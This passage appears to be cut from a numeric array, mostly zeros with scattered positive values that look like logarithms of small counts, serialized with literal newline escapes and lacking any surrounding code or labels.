0.0, 0.0, 0, 0, 0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 6.591673732008658, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 4.465908118654584, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 5.95562797505323, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 1.791759469228055, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 4.762173934797756, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 4.736198448394496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, \n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 4.330733340286331,\n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 5.101797476893978, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0,\n 0.0, 0.0, 6.102339570951937, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0, \n 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 5.459585514144159, 0, 0.0, 0.0, 0.0, 2.995732273553991, \n 3.2958368660043296, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0.0, 8.73217391546585, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 1.3862943611198906, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.5263605246161616, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.7412592803704001,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0.0, 0,\n 0, 1.9459101490553132, 0, 0.0, 0, 4.795790545596741, 0, 0.0, \n 4.518263445217986, 3.5553480614894135, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.101797476893978, 0.0, 0.6931471805599453, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0.6931471805599453, 0.0, 1.3862943611198906, 0, 0.0,\n 0.0, 0, 1.7412592803704001, 0, 0, 3.93848385770662, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 4.160336650881089, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 2.9444389791664403,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 4.204692619390966, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.6888794541139363, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 9.174503799921432, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.8858724694518925, 0.0, 0, 0.0, 0, \n 1.0986122886681098, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 1.3862943611198906, 0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, \n 1.3862943611198906, 0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 4.2626798770413155, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.70805020110221, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.784189633918261, 0.0, 0, 0, 0.0, 0, 2.0794415416798357, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6888794541139363, 0, \n 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 5.46286043483228, 6.127701357652087, 0, 0.0, 0, 0.0, \n 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.7369991058576035, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.666426688112432, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0.0, 0, \n 0, 3.6635616461296467, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.791759469228055, 0.0, 0, 0, 0.0, 0, 0, 1.0986122886681098, 0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.772588722239781, 0, 2.772588722239781, 0.0, 0, 0.0, \n 3.5553480614894135, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, \n 4.748123315783209, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.66682536764049, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 1.9459101490553132, 0, 1.0986122886681098, 0, 0, 0, \n 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.6375861597263857, 0, 0.0,\n 0.0, 2.70805020110221, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 6.54135323573334, 0, 0.0,\n 2.0794415416798357, 0, 0, 1.9459101490553132, 0, 0.0, 0, 0.0, \n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.8066624897703196, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 5.666426688112432, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 